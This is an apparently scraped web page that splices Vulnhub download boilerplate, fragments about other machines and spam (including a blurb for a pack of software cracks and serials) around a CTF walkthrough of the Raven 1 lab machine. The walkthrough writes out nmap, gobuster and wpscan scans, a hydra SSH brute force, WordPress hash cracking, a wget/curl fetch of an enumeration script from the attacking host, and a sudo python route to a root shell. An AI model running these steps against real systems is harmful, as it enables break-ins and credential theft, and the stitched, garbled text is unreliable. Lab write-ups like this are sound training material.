Vulnhub Raven 1 Walkthrough

Leave a comment

Here you can download the mentioned files using various methods.We have listed the original source, from the author's page. However, after time these links 'break', for example: either the files are moved, they have reached their maximum bandwidth limit, or, their hosting/domain has expired.For these reasons, we have been in touch with each author asking for permission to mirror the files.

If the author has agreed, we have created mirrors. These are untouched copies of the listed files. (You can check for yourself via the MD5 & SHA1 checksums which are individually displayed on their entry page. Whitney houston music mp3. See how ).We also offer the download via BitTorrent.

Today we’ll be continuing with our series on Vulnhub virtual machine exercises. In this article, we will see a walkthrough of an interesting Vulnhub machine called Vulnix. Note: For all of these machines, I have used the VMware workstation to provision the virtual machines (VMs). Index.php is of course the site we came in on, but raven.php is new. You received a raven with this message: “To pass through the wall, mcrypt spell will help you. It doesn’t matter who you are, only the key is needed to open the secret door” – Anonymous. We’ll file that hint away for later. Now let’s see if we can get into Dorne.

We prefer that people use BitTorrent, however, we do understand that it is not as straight forward as clicking on a direct link.To make sure everyone using VulnHub has the best experience possible using the site, we have had to. Limit the amount of simultaneous direct download files to two files, with a max speed of 3mb.This is because the average file size is currently about 700mb, which causes our bandwidth to be high (couple of terabytes each month!).

As this is a privately funded project, we believe we have chosen the best hosting provider for the limited budget.If would you like to be able to download a mass, and at quicker speed, please use torrents as these will be seeded 24/7. For a guide on how to setup and use torrents, see.If you're the owner of a listed file or believe that we are unlawfully distributing files without permission, please get in touch. To make sure that the files haven't been altered in any manner, you can check the checksum of the file.This makes sure that the you have acquired the same file which was transferred to you, without being modified/changed/damaged.Some authors publish the checksums in the README files, on their homepages or sometimes inside compressed archive (if it has been compressed).VulnHub also lists the MD5 & SHA1 checksums for every file which it offers to download, allowing you to check. You can find all the checksums, otherwise, they will be individually displayed on their entry page. To check the checksum, you can do it.You can find out how to check the file's checksum.

VulnHub: Raven 1 Walkthrough

Writeup for the Raven machine from VulnHub. A directory busting scanreveals a wordpress installation from which we can find two usernames. We can easily bruteforce theSSH credentials for one of these users using hydra to gain a low privilege shell, which we useto discover a plaintext password for the MySQL database in the wordpress config file. Exploringthe database reveals another password stored as a Wordpress MD5 hash, which we can crack with JtR.From there, we can use a python installation running as root to gain a root shell.

Starting off with an nmap scan:nmap -sC -sV -oA Raven 10.0.2.5

You can see that that it's an Apache server running off port 80. Feel free to navigate to it in a web browserand click around for a bit. In the meantime, we should have some other scans going on in thebackground.

Let's start with a directory busting scan. I like gobuster, but feel free to use your tool of choice.Gobuster scan: gobuster -u 10.0.2.5 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

We discover a wordpress installation. We can run another directory-busting scan on that directory,and we could probe a bit more with wpscan: wpscan --url http://10.0.2.5/wordpress -e --wp-content-dir wp-content

We gain two wordpress users. We could try to log into wordpress at 10.0.2.5/wordpress/wp-login.php,or try our luck with SSH. I prepared hydra and tried at SSH first, since it will be more valuable if it ends up working. If it doesn't, we'll go ahead with wordpress. Either way, we need to create a text file with our users to feed into hydra. Since there are only 2 users, doing it manually is fine. I put them into a file called users.txt. Here's the command:hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -e nsr -o hydra.log -t8 -f ssh://10.0.2.5. If you're using Kali, unzip whichever wordlist you decided to use. I just used rockyou. Hydra uses 16 threads by default, so I reduced it to 8. Too many parallel connections can cause errors or disable the service.

And with that, we get michael's SSH password and a low privilege shell.Log in with ssh michael@10.0.2.5. Now we start enumerating again.Now that we have a shell, let's take a look at the wordpress folder. Specifically, in wp-config.php. On the way there, I stumbled across flag 2, in /var/www/:flag2{fc3fd58dcdad9ab23faca6e9a36e581c}.

We find the credentials to log into the MySQL database. Wordpress requires MySQL or MariaDB to work, so the credentials for either were likely to exist on the machine. Let's try logging in with the password we found.

And it worked. We get a prompt. Let's start poking around.

wp-users looks interesting.

KCNcrew Pack 10-15-19. It's like Serial Box, which has SN's but KCN also has cracks and patches. It would be best to have both of these collections, as this often has serials you cannot find in Serial Box. Unlike Serial Box, no readers are required. Just open the dmg file, drag and drop the application to where you like. Kcn mac.

Here's our users again, but we've got some password hashes this time. We still don't have steven's account, so let's try cracking his password. These are MD5 Wordpress hashes:

We'll be using JtR for this. First, we need to create a password file: echo steven:P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ > steven.txt.

Cracked in 4 seconds with rockyou. Now we can log into steven's wordpress account..but let's try SSH first. Michael reused his password, so maybe Steven did as well. This whole machine seems to be an exercise in weak credentials anyway.

It worked. Thats another user, so let's start enumerating again. Lets automate it this time with LinEnum.sh. On the attacking machine, host the script with python -m SimpleHTTPServer 9999. On the victim machine, grab the file using wget or curl: wget 10.0.2.5:9999/file.txt OR curl -O http://10.0.2.5/file.txt. Here's the important bit:

Turns out that steven can run python as root without a password. (We could get this same information with sudo -l while logged in as steven.) Since we can run python as root, and python can spawn a shell, we'll use it to spawn a root shell. Some other common programs that can spawn a shell are nmap, nc, vim, and more. Keep an eye out for these running with root permissions for an easy privesc. I'll use the python interpreter to spawn a shell:

And with that, we get a root shell. Navigate to the root directory to grab flag 4 and that's the box.